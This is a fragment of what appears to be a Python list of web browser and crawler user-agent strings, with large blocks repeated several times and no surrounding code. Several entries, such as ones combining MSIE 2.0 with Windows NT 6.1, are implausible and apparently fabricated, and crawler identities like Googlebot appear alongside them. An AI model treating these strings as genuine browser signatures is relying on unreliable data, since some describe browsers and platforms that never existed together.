'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
